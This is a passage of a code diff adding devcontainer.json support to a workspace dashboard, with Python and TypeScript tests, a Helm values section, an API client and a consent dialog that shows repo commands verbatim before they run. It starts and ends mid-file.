+            result = PM.discover(auto_provision=True)
+        candidate = result['candidates'][0]
+        self.assertEqual(candidate['confidence'], 'high')
+        self.assertTrue(candidate['registered'])
+        self.assertIn('devcontainer', candidate['reasons'])
+        # The config `name` beats the bare directory label for an unnamed
+        # candidate.
+        self.assertEqual(candidate['name'], 'Payments API')
+
+    def test_discover_does_not_rename_when_the_config_has_no_name(self):
+        self._make('api', {'forwardPorts': [3000]})
+        fake_dirs = [{'path': os.path.join(self.tmp, 'api'), 'label': 'api',
+                      'is_git_repo': False, 'is_project': True,
+                      'has_devcontainer': True, 'mtime': 5}]
+        with mock.patch.object(server.WorkspaceManager, 'list_dirs',
+                               return_value=fake_dirs), \
+             mock.patch.object(server, 'MemoryManager', _FakeMemory([])):
+            result = PM.discover(auto_provision=True)
+        self.assertEqual(result['candidates'][0]['name'], 'api')
+
+    def test_discover_survives_an_unparseable_config(self):
+        self._make('api', '{ broken')
+        fake_dirs = [{'path': os.path.join(self.tmp, 'api'), 'label': 'api',
+                      'is_git_repo': False, 'is_project': True,
+                      'has_devcontainer': True, 'mtime': 5}]
+        with mock.patch.object(server.WorkspaceManager, 'list_dirs',
+                               return_value=fake_dirs), \
+             mock.patch.object(server, 'MemoryManager', _FakeMemory([])):
+            result = PM.discover(auto_provision=True)
+        self.assertEqual(result['candidates'][0]['name'], 'api')
+        self.assertEqual(result['candidates'][0]['confidence'], 'high')
+
+    # ── brief ────────────────────────────────────────────────────────────
+
+    def test_brief_carries_the_read_through_summary(self):
+        wd = self._make('kc', {'name': 'KC dev', 'forwardPorts': [3000],
+                               'postCreateCommand': 'npm ci',
+                               'features': {'ghcr.io/x/node:1': {}}})
+        PM.create({'id': 'kc', 'workdirs': [wd]})
+        with self._patch_memory([]):
+            brief = PM.brief('kc')
+        self.assertEqual(len(brief['devcontainer']), 1)
+        entry = brief['devcontainer'][0]
+        self.assertEqual(entry['name'], 'KC dev')
+        self.assertEqual(entry['ports'], 1)
+        self.assertEqual(entry['blocking_keys'], ['features'])
+        md = brief['brief_markdown']
+        self.assertIn('## Dev container', md)
+        self.assertIn('KC dev', md)
+        self.assertIn('features', md)
+
+    def test_brief_omits_the_section_when_no_workdir_has_one(self):
+        wd = self._make('kc')
+        PM.create({'id': 'kc', 'workdirs': [wd]})
+        with self._patch_memory([]):
+            brief = PM.brief('kc')
+        self.assertEqual(brief['devcontainer'], [])
+        self.assertNotIn('## Dev container', brief['brief_markdown'])
+
+    def test_brief_survives_an_unparseable_config(self):
+        wd = self._make('kc', '{ broken')
+        PM.create({'id': 'kc', 'workdirs': [wd]})
+        with self._patch_memory([]):
+            brief = PM.brief('kc')
+        self.assertTrue(brief['devcontainer'][0]['error'])
+        self.assertIn('unreadable', brief['brief_markdown'])
+        # The rest of the brief is intact — a broken repo file must not take
+        # the whole digest down.
+        self.assertIn('## Tasks', brief['brief_markdown'])
+
+    def test_brief_markdown_section_is_last_and_capped_at_three(self):
+        workdirs = [self._make(f'w{i}', {'name': f'env {i}'}) for i in range(5)]
+        PM.create({'id': 'kc', 'workdirs': workdirs})
+        with self._patch_memory([_mem('project.kc', 'g', 'a goal',
+                                      tags=['goal'])]):
+            brief = PM.brief('kc')
+        md = brief['brief_markdown']
+        self.assertEqual(len(brief['devcontainer']), 5)
+        self.assertIn('env 0', md)
+        self.assertNotIn('env 3', md)
+        self.assertIn('+2 more', md)
+        # LAST, because _BRIEF_MARKDOWN_CAP truncates from the end: losing the
+        # goals to make room for a port list would be a regression.
+        self.assertGreater(md.index('## Dev container'), md.index('## Goals'))
+
+    def test_brief_is_unaffected_when_the_module_is_missing(self):
+        wd = self._make('kc', {'name': 'KC dev'})
+        PM.create({'id': 'kc', 'workdirs': [wd]})
+        with mock.patch.object(server, '_DEVCONTAINER_AVAILABLE', False), \
+                self._patch_memory([]):
+            brief = PM.brief('kc')
+        self.assertEqual(brief['devcontainer'], [])
+
+
 class ReadonlyChokepointTest(unittest.TestCase):
     """Project mutations live in do_POST/do_PUT/do_DELETE, each of which calls
     _readonly_block() first; verify that chokepoint blocks when READONLY_MODE."""

--- a/charts/workspace/values.yaml
+++ b/charts/workspace/values.yaml
@@ -458,6 +458,28 @@ hypervisor:
 cto:
   enabled: true
 
+# devcontainer.json support (#594) — read the environment file a repo already
+# carries (Codespaces / Coder / Ona / DevPod all use it) and apply the parts
+# that work inside this pod: forwarded ports land on the Apps page, VS Code
+# extensions and settings reach code-server, containerEnv/remoteEnv reach the
+# agent. Detection and reporting are read-only and never execute anything.
+#
+# WHAT IT DELIBERATELY CANNOT DO. `features`, `image`, `build` and
+# `dockerComposeFile` are reported with a reason instead of being silently
+# ignored: the pod runs as UID 1000 with allowPrivilegeEscalation=false and
+# build.mode defaults to kaniko, so there is no root and no Docker daemon.
+# That boundary is a documented product decision, not a TODO.
+devcontainer:
+  enabled: true
+  # Re-run postStartCommand once per pod boot. Requires BOTH this flag and a
+  # per-workdir opt-in the user set from the dashboard, AND a devcontainer.json
+  # whose hash still matches what they consented to. Set false to make command
+  # execution require an explicit click, always.
+  autoApplyOnBoot: true       # DEVCONTAINER_AUTO_APPLY
+  # Wall-clock ceiling for one lifecycle command. The whole process GROUP is
+  # killed on expiry, so a runaway `npm install` cannot outlive it.
+  commandTimeoutSeconds: 900  # DEVCONTAINER_TIMEOUT
+
 # Conversation Gateway — chat with this workspace's agent over WhatsApp
 # (issue #325). OFF by default: with `enabled: false` the /api/gateway/*
 # config surface is inert AND templates/ingress-gateway.yaml (the public,

--- a/charts/workspace/web/src/api/devcontainer.test.ts
+++ b/charts/workspace/web/src/api/devcontainer.test.ts
@@ -1,0 +1,131 @@
+import { describe, expect, it, afterEach, vi } from 'vitest';
+import {
+  getDevcontainer,
+  scanDevcontainers,
+  applyDevcontainer,
+  resetDevcontainer,
+  DevcontainerConflictError,
+} from './devcontainer';
+
+/**
+ * API-layer tests for #594. The two that carry weight:
+ *   * the config_hash goes into the apply body — it is the compare-and-swap
+ *     that makes "the user approved this exact text" true;
+ *   * a 409 surfaces as a TYPED conflict so the dialog can reload and
+ *     re-prompt instead of showing a raw error string.
+ */
+
+const realFetch = globalThis.fetch;
+afterEach(() => {
+  globalThis.fetch = realFetch;
+});
+
+function respond(status: number, body: unknown) {
+  const calls: { url: string; method: string; body?: string }[] = [];
+  globalThis.fetch = vi.fn(async (u: string, init?: RequestInit) => {
+    calls.push({ url: u, method: init?.method ?? 'GET', body: init?.body as string | undefined });
+    return {
+      ok: status >= 200 && status < 300,
+      status,
+      statusText: '',
+      headers: {
+        get: (k: string) => (k.toLowerCase() === 'content-type' ? 'application/json' : null),
+      },
+      json: async () => body,
+      text: async () => JSON.stringify(body),
+    } as unknown as Response;
+  }) as unknown as typeof fetch;
+  return calls;
+}
+
+describe('getDevcontainer', () => {
+  it('URL-encodes the workdir', async () => {
+    const calls = respond(200, { found: false });
+    await getDevcontainer('/home/dev/my project');
+    expect(calls[0].url).toContain('workdir=%2Fhome%2Fdev%2Fmy+project');
+  });
+
+  it('coerces missing arrays so the renderer cannot crash', async () => {
+    respond(200, { found: true, workdir: '/home/dev/api' });
+    const rec = await getDevcontainer('/home/dev/api');
+    expect(rec.ports).toEqual([]);
+    expect(rec.unsupported).toEqual([]);
+    expect(rec.lifecycle.postCreate).toEqual([]);
+    expect(rec.applied.ports_pinned).toEqual([]);
+    expect(rec.applied.auto_apply).toBe(false);
+  });
+
+  it('passes a found:false 200 through as data, not an error', async () => {
+    respond(200, { found: false, workdir: '/home/dev/plain' });
+    const rec = await getDevcontainer('/home/dev/plain');
+    expect(rec.found).toBe(false);
+  });
+
+  it('keeps every lifecycle hook present', async () => {
+    respond(200, {
+      found: true,
+      lifecycle: { postCreate: [{ display: 'npm ci', kind: 'shell' }] },
+    });
+    const rec = await getDevcontainer('/home/dev/api');
+    expect(rec.lifecycle.postCreate).toHaveLength(1);
+    expect(rec.lifecycle.onCreate).toEqual([]);
+    expect(rec.lifecycle.postStart).toEqual([]);
+  });
+});
+
+describe('scanDevcontainers', () => {
+  it('unwraps the envelope', async () => {
+    respond(200, { devcontainers: [{ workdir: '/home/dev/api' }], count: 1 });
+    expect(await scanDevcontainers()).toHaveLength(1);
+  });
+
+  it('defaults to an empty list when the field is missing', async () => {
+    respond(200, {});
+    expect(await scanDevcontainers()).toEqual([]);
+  });
+});
+
+describe('applyDevcontainer', () => {
+  it('sends the config hash and the selected hooks', async () => {
+    const calls = respond(202, { workdir: '/home/dev/api', hooks_started: ['postCreate'] });
+    await applyDevcontainer({
+      workdir: '/home/dev/api', hooks: ['postCreate'], config_hash: 'abc123',
+    });
+    const body = JSON.parse(calls[0].body as string);
+    expect(calls[0].method).toBe('POST');
+    expect(body.config_hash).toBe('abc123');
+    expect(body.hooks).toEqual(['postCreate']);
+  });
+
+  it('surfaces a stale-hash 409 as a typed conflict', async () => {
+    respond(409, { code: 'hash_mismatch', error: 'devcontainer.json changed' });
+    await expect(applyDevcontainer({
+      workdir: '/home/dev/api', hooks: ['postCreate'], config_hash: 'old',
+    })).rejects.toBeInstanceOf(DevcontainerConflictError);
+  });
+
+  it('surfaces a busy 409 with its code', async () => {
+    respond(409, { code: 'busy', error: 'already running' });
+    await applyDevcontainer({ workdir: '/home/dev/api', hooks: ['postCreate'], config_hash: 'x' })
+      .then(() => { throw new Error('should have rejected'); })
+      .catch((err) => {
+        expect(err).toBeInstanceOf(DevcontainerConflictError);
+        expect(err.code).toBe('busy');
+      });
+  });
+
+  it('leaves other errors as ApiError', async () => {
+    respond(422, { error: 'invalid JSON' });
+    await expect(applyDevcontainer({ workdir: '/home/dev/api' }))
+      .rejects.not.toBeInstanceOf(DevcontainerConflictError);
+  });
+});
+
+describe('resetDevcontainer', () => {
+  it('posts the workdir and the unpin flag', async () => {
+    const calls = respond(200, { cleared: true, unpinned: [3000] });
+    await resetDevcontainer('/home/dev/api', true);
+    const body = JSON.parse(calls[0].body as string);
+    expect(body).toEqual({ workdir: '/home/dev/api', unpin_ports: true });
+  });
+});

--- a/charts/workspace/web/src/api/devcontainer.ts
+++ b/charts/workspace/web/src/api/devcontainer.ts
@@ -1,0 +1,219 @@
+import { apiGet, apiPost, ApiError } from './client';
+import { safeArray, safeString } from './shape';
+
+/**
+ * devcontainer.json client (#594).
+ *
+ * A repo carries `devcontainer.json` to describe its own environment — the
+ * same file Codespaces, Coder, Ona and DevPod read. kube-coder interprets it
+ * INSIDE the existing workspace pod: forwarded ports become Apps pins, VS Code
+ * extensions and settings reach code-server, containerEnv/remoteEnv reach the
+ * agent. It does not build a container, and the properties that would require
+ * one (`features`, `image`, `build`, `dockerComposeFile`) come back in
+ * `unsupported` with a reason and a remedy rather than being dropped silently.
+ *
+ * Two things the UI must honour:
+ *   * `found: false` arrives as 200, not 404 — "no devcontainer here" is a
+ *     normal answer. Do not treat it as an error.
+ *   * `config_hash` must be echoed back on any apply that runs commands. It is
+ *     a compare-and-swap: without it, a `git pull` between the dialog
+ *     rendering the command text and the user clicking Confirm means they
+ *     approved one command and a different one ran.
+ */
+
+export type HookName = 'onCreate' | 'updateContent' | 'postCreate' | 'postStart';
+export const HOOKS: HookName[] = ['onCreate', 'updateContent', 'postCreate', 'postStart'];
+
+export type LifecycleState =
+  | 'none' | 'pending' | 'running' | 'done' | 'stale' | 'failed' | 'timed_out';
+
+export type UnsupportedSeverity = 'blocking' | 'partial' | 'ignored';
+
+export interface DevcontainerCommand {
+  /** '' for the string/array forms; the key for the object form. */
+  name: string;
+  kind: 'shell' | 'argv';
+  command: string | string[];
+  /** Exactly what will run — render this VERBATIM in the confirm dialog. */
+  display: string;
+  needs_root: boolean;
+  root_reasons: string[];
+  caveats: string[];
+}
+
+export interface UnsupportedProperty {
+  key: string;
+  severity: UnsupportedSeverity;
+  detail: string;
+  reason: string;
+  remedy: string;
+}
+
+export interface DevcontainerPort {
+  port: number;
+  label: string;
+}
+
+export interface LifecycleEntry {
+  status: LifecycleState;
+  count: number;
+  ran_at?: number | null;
+  exit_code?: number | null;
+  log_tail?: string;
+  log_path?: string;
+}
+
+export interface DevcontainerApplied {
+  ports_pinned: number[];
+  extensions_installed: string[];
+  settings_written: Record<string, unknown>;
+  env: Record<string, string>;
+  applied_at: number | null;
+  auto_apply: boolean;
+  consented_hash: string;
+}
+
+export interface DevcontainerRecord {
+  workdir: string;
+  found: boolean;
+  path: string;
+  rel_path: string;
+  /** Non-empty when the file exists but could not be read or parsed. */
+  error: string;
+  error_line: number;
+  error_column: number;
+  config_hash: string;
+  name: string;
+  workspace_folder: string;
+  lifecycle: Record<HookName, DevcontainerCommand[]>;
+  ports: DevcontainerPort[];
+  ports_skipped: { value: unknown; reason: string }[];
+  extensions: string[];
+  extensions_rejected: { value: string; reason: string }[];
+  settings: Record<string, unknown>;
+  settings_denied: { key: string; reason: string }[];
+  env: Record<string, string>;
+  env_denied: { key: string; reason: string }[];
+  unsupported: UnsupportedProperty[];
+  caveats: string[];
+  needs_root: boolean;
+  applied: DevcontainerApplied;
+  lifecycle_status: Partial<Record<HookName, LifecycleEntry>>;
+  busy: boolean;
+}
+
+export interface DevcontainerSummary {
+  workdir: string;
+  label: string;
+  found: true;
+  path: string;
+  name: string;
+  config_hash: string;
+  ports: number;
+  extensions: number;
+  settings: number;
+  env: number;
+  hooks: Partial<Record<HookName, number>>;
+  unsupported: number;
+  blocking: number;
+  blocking_keys: string[];
+  needs_root: boolean;
+  error?: string;
+}
+
+export interface ApplyInput {
+  workdir: string;
+  /** Empty (the default) applies ports/settings/extensions/env and runs nothing. */
+  hooks?: HookName[];
+  /** REQUIRED whenever `hooks` is non-empty. See the note at the top. */
+  config_hash?: string;
+  /** Opt this workdir into the once-per-boot postStart pass. */
+  auto_apply?: boolean;
+}
+
+export interface ApplyResult {
+  workdir: string;
+  config_hash: string;
+  ports_pinned: number[];
+  port_conflicts: { port: number; label: string; existing: string; reason: string }[];
+  settings_written: string[];
+  settings_skipped: { key: string; reason: string }[];
+  extensions_installed: string[];
+  extension_failures: { id: string; reason: string }[];
+  env: string[];
+  hooks_started: HookName[];
+  unsupported: UnsupportedProperty[];
+}
+
+const emptyLifecycle = (): Record<HookName, DevcontainerCommand[]> =>
+  ({ onCreate: [], updateContent: [], postCreate: [], postStart: [] });
+
+const coerceRecord = (raw: DevcontainerRecord): DevcontainerRecord => {
+  const life = emptyLifecycle();
+  for (const h of HOOKS) life[h] = safeArray(raw?.lifecycle?.[h]) as DevcontainerCommand[];
+  return {
+    ...raw,
+    workdir: safeString(raw?.workdir),
+    found: !!raw?.found,
+    rel_path: safeString(raw?.rel_path),
+    error: safeString(raw?.error),
+    name: safeString(raw?.name),
+    config_hash: safeString(raw?.config_hash),
+    lifecycle: life,
+    ports: safeArray(raw?.ports) as DevcontainerPort[],
+    ports_skipped: safeArray(raw?.ports_skipped) as DevcontainerRecord['ports_skipped'],
+    extensions: safeArray(raw?.extensions) as string[],
+    extensions_rejected: safeArray(raw?.extensions_rejected) as DevcontainerRecord['extensions_rejected'],
+    settings: raw?.settings ?? {},
+    settings_denied: safeArray(raw?.settings_denied) as DevcontainerRecord['settings_denied'],
+    env: raw?.env ?? {},
+    env_denied: safeArray(raw?.env_denied) as DevcontainerRecord['env_denied'],
+    unsupported: safeArray(raw?.unsupported) as UnsupportedProperty[],
+    caveats: safeArray(raw?.caveats) as string[],
+    lifecycle_status: raw?.lifecycle_status ?? {},
+    applied: {
+      ports_pinned: safeArray(raw?.applied?.ports_pinned) as number[],
+      extensions_installed: safeArray(raw?.applied?.extensions_installed) as string[],
+      settings_written: raw?.applied?.settings_written ?? {},
+      env: raw?.applied?.env ?? {},
+      applied_at: raw?.applied?.applied_at ?? null,
+      auto_apply: !!raw?.applied?.auto_apply,
+      consented_hash: safeString(raw?.applied?.consented_hash),
+    },
+  };
+};
+
+export const getDevcontainer = (workdir: string) =>
+  apiGet<DevcontainerRecord>('/api/devcontainer', { workdir }).then(coerceRecord);
+
+export const scanDevcontainers = () =>
+  apiGet<{ devcontainers: DevcontainerSummary[]; count: number }>('/api/devcontainer/scan')
+    .then((r) => safeArray(r?.devcontainers) as DevcontainerSummary[]);
+
+/**
+ * Thrown when devcontainer.json changed between load and confirm (409
+ * hash_mismatch), or when a run is already in progress (409 busy). Typed so
+ * the dialog can re-load and re-prompt instead of showing a raw error.
+ */
+export class DevcontainerConflictError extends Error {
+  code: 'hash_mismatch' | 'busy' | string;
+  constructor(code: string, message: string) {
+    super(message);
+    this.name = 'DevcontainerConflictError';
+    this.code = code;
+  }
+}
+
+export const applyDevcontainer = (input: ApplyInput) =>
+  apiPost<ApplyResult>('/api/devcontainer/apply', input).catch((err) => {
+    const status = (err as ApiError)?.status;
+    const body = (err as { body?: { code?: string; error?: string } })?.body;
+    if (status === 409 && body?.code) {
+      throw new DevcontainerConflictError(body.code, body.error ?? 'conflict');
+    }
+    throw err;
+  });
+
+export const resetDevcontainer = (workdir: string, unpinPorts = false) =>
+  apiPost<{ workdir: string; cleared: boolean; unpinned: number[] }>(
+    '/api/devcontainer/reset', { workdir, unpin_ports: unpinPorts });

--- a/charts/workspace/web/src/api/events.ts
+++ b/charts/workspace/web/src/api/events.ts
@@ -36,6 +36,7 @@ const EVENT_TYPES = [
   'gateway.preview',
   'projects.changed',
   'feed.item',
+  'devcontainer.changed',
 ];
 
 let es: EventSource | null = null;

--- a/charts/workspace/web/src/api/projects.ts
+++ b/charts/workspace/web/src/api/projects.ts
@@ -67,6 +67,27 @@ export interface BriefTrigger {
   schedule?: string;
 }
 
+/** Per-workdir devcontainer.json summary, read through on every brief (#594).
+ *  Counts only — the full record comes from /api/devcontainer. */
+export interface BriefDevcontainer {
+  workdir: string;
+  found: true;
+  path?: string;
+  name?: string;
+  config_hash?: string;
+  ports?: number;
+  extensions?: number;
+  settings?: number;
+  env?: number;
+  hooks?: Record<string, number>;
+  unsupported?: number;
+  blocking?: number;
+  blocking_keys?: string[];
+  needs_root?: boolean;
+  /** Set instead of the counts when the file exists but could not be parsed. */
+  error?: string;
+}
+
 export interface ProjectBrief {
   project: Project;
   tasks: {
@@ -79,6 +100,7 @@ export interface ProjectBrief {
   decisions: BriefMemory[];
   memories: BriefMemory[];
   git: BriefGit[];
+  devcontainer?: BriefDevcontainer[];
   triggers: BriefTrigger[];
   counts: { goals: number; decisions: number; memories: number; tasks: number };
   brief_markdown: string;

--- a/charts/workspace/web/src/api/system.ts
+++ b/charts/workspace/web/src/api/system.ts
@@ -22,6 +22,10 @@ export interface ServerMode {
    *  are shown; false hides them (deployment set `cto.enabled: false`, or the
    *  Hypervisor it rides is off). */
   ctoEnabled?: boolean;
+  /** devcontainer.json support (#594). Independent of ctoEnabled — reading a
+   *  repo's own environment file is a workspace capability, not part of the
+   *  CTO page. False hides the Dev container card and 404s /api/devcontainer*. */
+  devcontainerEnabled?: boolean;
 }
 
 export const getMode = () => apiGet<ServerMode>('/api/mode');

--- a/charts/workspace/web/src/routes/cto/BriefPanel.tsx
+++ b/charts/workspace/web/src/routes/cto/BriefPanel.tsx
@@ -1,6 +1,8 @@
 import { Icon } from '../../components/Icon';
 import { navigate } from '../../store/router';
 import { brief, briefLoading, selectedProjectId } from '../../store/projects';
+import { serverMode } from '../../store/server-mode';
+import { DevcontainerPanel } from './DevcontainerPanel';
 import type { BriefMemory } from '../../api/projects';
 
 /**
@@ -277,6 +279,17 @@ export function BriefPanel({ onCollapse }: { onCollapse?: () => void } = {}) {
           </ul>
         </Section>
       )}
+
+      {/* Dev container (#594), last and only for workdirs that actually have
+          one. The brief tells us WHICH workdirs carry a devcontainer.json (a
+          read-through summary computed server-side); the panel then fetches
+          the full record for each. Gated on the server flag so a deployment
+          with devcontainer.enabled=false renders nothing rather than a card
+          that 404s on load. */}
+      {serverMode.value.devcontainerEnabled !== false &&
+        (b.devcontainer ?? []).map((d) => (
+          <DevcontainerPanel key={d.workdir} workdir={d.workdir} />
+        ))}
     </aside>
   );
 }

--- a/charts/workspace/web/src/routes/cto/DevcontainerApplyDialog.tsx
+++ b/charts/workspace/web/src/routes/cto/DevcontainerApplyDialog.tsx
@@ -1,0 +1,170 @@
+import { useState } from 'preact/hooks';
+import { Modal } from '../../components/Modal';
+import { Button } from '../../components/primitives/Button';
+import {
+  devcontainerFor,
+  closeApplyDialog,
+  applyDevcontainerTo,
+  applyingDevcontainer,
+} from '../../store/devcontainer';
+import { HOOKS, type HookName } from '../../api/devcontainer';
+
+/**
+ * The consent dialog (#594).
+ *
+ * This is the only place in the dashboard where a user authorizes running code
+ * that came out of a cloned repo, so it is deliberately blunt:
+ *
+ *   * Every command is rendered VERBATIM in a <pre>. No truncation, no
+ *     summarizing — the user approves the exact text that will run.
+ *   * Blocking unsupported properties are repeated ABOVE the command list, so
+ *     nobody approves a postCreate believing their `features` already
+ *     installed.
+ *   * `needs_root` warnings sit inline with the command that carries them. The
+ *     pod cannot escalate, so those commands WILL fail; saying so before the
+ *     click turns a confusing 15-minute failure into an upfront decision.
+ *   * The config hash loaded with the record is sent back with the request.
+ *     If devcontainer.json changed in between, the server 409s rather than
+ *     running text the user never saw.
+ *
+ * Hooks are opt-in per checkbox and default to OFF. The safe action — pin the
+ * ports, write the settings, install the extensions — is one click away
+ * without running anything.
+ */
+export function DevcontainerApplyDialog({ workdir }: { workdir: string }) {
+  const rec = devcontainerFor(workdir);
+  const [selected, setSelected] = useState<Set<HookName>>(new Set());
+  const [autoApply, setAutoApply] = useState(false);
+
+  if (!rec || !rec.found || rec.error) return null;
+
+  const available = HOOKS.filter((h) => (rec.lifecycle[h] ?? []).length > 0);
+  const blocking = rec.unsupported.filter((u) => u.severity === 'blocking');
+  const anyRootNeeded = available.some((h) =>
+    rec.lifecycle[h].some((c) => c.needs_root));
+
+  const toggle = (hook: HookName) => {
+    const next = new Set(selected);
+    if (next.has(hook)) next.delete(hook);
+    else next.add(hook);
+    setSelected(next);
+  };
+
+  const onConfirm = async () => {
+    const hooks = HOOKS.filter((h) => selected.has(h));
+    const outcome = await applyDevcontainerTo(
+      workdir, hooks, rec.config_hash, autoApply || undefined);
+    // A conflict keeps the dialog open against the RELOADED record, so the
+    // user re-reads what actually changed instead of blind-retrying.
+    if (outcome.ok) closeApplyDialog();
+  };
+
+  return (
+    <Modal open onClose={closeApplyDialog} labelledBy="dc-apply-title" width={620}>
+      <h2 id="dc-apply-title" class="dc-dialog-title">
+        Apply {rec.name || 'devcontainer.json'}
+      </h2>
+      <p class="dc-dialog-sub"><code>{rec.rel_path}</code></p>
+
+      {blocking.length > 0 && (
+        <div class="dc-unsupported dc-unsupported-blocking">
+          <p class="dc-unsupported-head">
+            These will NOT be applied, whatever you select below:
+          </p>
+          <ul class="dc-unsupported-list">
+            {blocking.map((u) => (
+              <li key={u.key}>
+                <code>{u.key}</code>
+                <span class="dc-reason">{u.reason}</span>
+              </li>
+            ))}
+          </ul>
+        </div>
+      )}
+
+      <div class="dc-dialog-block">
+        <p class="dc-dialog-h">Applied immediately</p>
+        <ul class="dc-dialog-list">
+          <li>{rec.ports.length} forwarded port(s) pinned on the Apps page</li>
+          <li>{rec.extensions.length} extension(s) installed into code-server</li>
+          <li>{Object.keys(rec.settings).length} editor setting(s) merged</li>
+          <li>{Object.keys(rec.env).length} environment variable(s) for new builds</li>
+        </ul>
+      </div>
+
+      {available.length > 0 && (
+        <div class="dc-dialog-block">
+          <p class="dc-dialog-h">Commands from this repo</p>
+          <p class="dc-dialog-warn">
+            These run in your workspace with your GitHub token and provider keys
+            in reach. Nothing runs unless you tick it.
+          </p>
+          {available.map((hook) => (
+            <div key={hook} class="dc-hook-block">
+              <label class="dc-hook-label">
+                <input
+                  type="checkbox"
+                  checked={selected.has(hook)}
+                  onChange={() => toggle(hook)}
+                />
+                <code>{hook}</code>
+                <span class="dc-hook-count">
+                  {rec.lifecycle[hook].length} command(s)
+                </span>
+              </label>
+              {rec.lifecycle[hook].map((cmd, i) => (
+                <div key={`${hook}-${i}`} class="dc-cmd">
+                  {cmd.name && <span class="dc-cmd-name">{cmd.name}</span>}
+                  <pre class="dc-cmd-text">{cmd.display}</pre>
+                  {cmd.needs_root && (
+                    <p class="dc-cmd-root">
+                      ⚠ needs root — {cmd.root_reasons.join('; ')}. This
+                      workspace runs as UID 1000 with no privilege escalation,
+                      so this will fail.
+                    </p>
+                  )}
+                  {cmd.caveats.map((c) => (
+                    <p key={c} class="dc-cmd-caveat">{c}</p>
+                  ))}
+                </div>
+              ))}
+            </div>
+          ))}
+          {anyRootNeeded && (
+            <p class="dc-dialog-warn">
+              Install into <code>$HOME</code> instead (nvm, pyenv, rustup,
+              <code>pip --user</code>) — those persist on the workspace volume.
+            </p>
+          )}
+          {selected.has('postStart') && (
+            <label class="dc-hook-label dc-auto">
+              <input
+                type="checkbox"
+                checked={autoApply}
+                onChange={() => setAutoApply(!autoApply)}
+              />
+              Re-run <code>postStart</code> after every pod restart
+              <span class="dc-hook-count">
+                only while devcontainer.json is unchanged
+              </span>
+            </label>
+          )}
+        </div>
+      )}
+
+      <div class="dc-dialog-actions">
+        <Button variant="secondary" onClick={closeApplyDialog}>Cancel</Button>
+        <Button
+          variant={selected.size ? 'danger' : 'primary'}
+          class="dc-confirm"
+          disabled={applyingDevcontainer.value}
+          onClick={onConfirm}
+        >
+          {selected.size
+            ? `Apply and run ${selected.size} hook(s)`
+            : 'Apply without running commands'}
+        </Button>
+      </div>
+    </Modal>
+  );
+}

--- a/charts/workspace/web/src/routes/cto/DevcontainerPanel.test.tsx
+++ b/charts/workspace/web/src/routes/cto/DevcontainerPanel.test.tsx
@@ -1,0 +1,272 @@
+import { render, screen, fireEvent, waitFor } from '@testing-library/preact';
+import { describe, expect, it, afterEach, beforeEach, vi } from 'vitest';
+import { DevcontainerPanel } from './DevcontainerPanel';
+import { DevcontainerApplyDialog } from './DevcontainerApplyDialog';
+import {
+  devcontainers,
+  openApplyDialog,
+  _resetDevcontainerForTest,
+} from '../../store/devcontainer';
+import { serverMode } from '../../store/server-mode';
+import type { DevcontainerRecord } from '../../api/devcontainer';
+
+/**
+ * Component tests for #594. The assertions that matter are about DISCLOSURE:
+ *   * the blocking-unsupported block is rendered EXPANDED, not tucked into a
+ *     <details>, because someone who never opens it believes their `features`
+ *     installed;
+ *   * the apply dialog renders the command text VERBATIM — that string is what
+ *     the user is consenting to run;
+ *   * the needs-root warning is inline with the command that carries it;
+ *   * the hash the panel loaded with is the hash the apply sends.
+ */
+
+const emptyLifecycle = () => ({
+  onCreate: [], updateContent: [], postCreate: [], postStart: [],
+});
+
+function mk(over: Partial<DevcontainerRecord> = {}): DevcontainerRecord {
+  return {
+    workdir: '/home/dev/api', found: true, path: '/home/dev/api/.devcontainer/devcontainer.json',
+    rel_path: '.devcontainer/devcontainer.json', error: '', error_line: 0, error_column: 0,
+    config_hash: 'hash-1', name: 'Node 20 + Postgres', workspace_folder: '/home/dev/api',
+    lifecycle: emptyLifecycle(),
+    ports: [{ port: 3000, label: 'API' }],
+    ports_skipped: [], extensions: ['ms-python.python'], extensions_rejected: [],
+    settings: { 'editor.formatOnSave': true }, settings_denied: [],
+    env: { NODE_ENV: 'development' }, env_denied: [],
+    unsupported: [], caveats: [], needs_root: false,
+    applied: {
+      ports_pinned: [], extensions_installed: [], settings_written: {}, env: {},
+      applied_at: null, auto_apply: false, consented_hash: '',
+    },
+    lifecycle_status: {}, busy: false,
+    ...over,
+  } as DevcontainerRecord;
+}
+
+function seed(rec: DevcontainerRecord) {
+  devcontainers.value = { [rec.workdir]: rec };
+}
+
+const realFetch = globalThis.fetch;
+
+beforeEach(() => {
+  _resetDevcontainerForTest();
+  serverMode.value = { readOnly: false, authed: true, authMode: 'basic', demoShowAll: false };
+  // The panel loads on mount; answer with whatever is already seeded so the
+  // effect does not blank the store mid-assertion.
+  globalThis.fetch = vi.fn(async (u: string) => {
+    const wd = decodeURIComponent(new URL(u, 'http://x').searchParams.get('workdir') ?? '');
+    const body = devcontainers.value[wd] ?? { found: false };
+    return {
+      ok: true, status: 200, statusText: '',
+      headers: { get: () => 'application/json' },
+      json: async () => body, text: async () => JSON.stringify(body),
+    } as unknown as Response;
+  }) as unknown as typeof fetch;
+});
+
+afterEach(() => {
+  globalThis.fetch = realFetch;
+  vi.restoreAllMocks();
+  _resetDevcontainerForTest();
+});
+
+describe('DevcontainerPanel', () => {
+  it('renders nothing when the workdir has no devcontainer', () => {
+    const { container } = render(<DevcontainerPanel workdir="/home/dev/plain" />);
+    expect(container.querySelector('.dc-section')).toBeNull();
+  });
+
+  it('renders the name and the declared counts', () => {
+    seed(mk());
+    render(<DevcontainerPanel workdir="/home/dev/api" />);
+    expect(screen.getByText('Node 20 + Postgres')).toBeTruthy();
+    expect(screen.getByText(/1 ports/)).toBeTruthy();
+    expect(screen.getByText(/1 extensions/)).toBeTruthy();
+  });
+
+  it('renders per-hook status pills', () => {
+    seed(mk({
+      lifecycle: {
+        ...emptyLifecycle(),
+        postCreate: [{ name: '', kind: 'shell', command: 'npm ci', display: 'npm ci', needs_root: false, root_reasons: [], caveats: [] }],
+      },
+      lifecycle_status: {
+        postCreate: { status: 'pending', count: 1 },
+        postStart: { status: 'done', count: 1, ran_at: Math.floor(Date.now() / 1000) - 120 },
+      },
+    }));
+    render(<DevcontainerPanel workdir="/home/dev/api" />);
+    expect(screen.getByText('not run')).toBeTruthy();
+    expect(screen.getByText('ran')).toBeTruthy();
+    expect(screen.getByText('2m ago')).toBeTruthy();
+  });
+
+  it('shows blocking unsupported properties EXPANDED, with reason and remedy', () => {
+    seed(mk({
+      unsupported: [{
+        key: 'features', severity: 'blocking',
+        detail: 'ghcr.io/devcontainers/features/node:1',
+        reason: 'Dev container features install as root at image-build time.',
+        remedy: 'Move it to postCreateCommand.',
+      }],
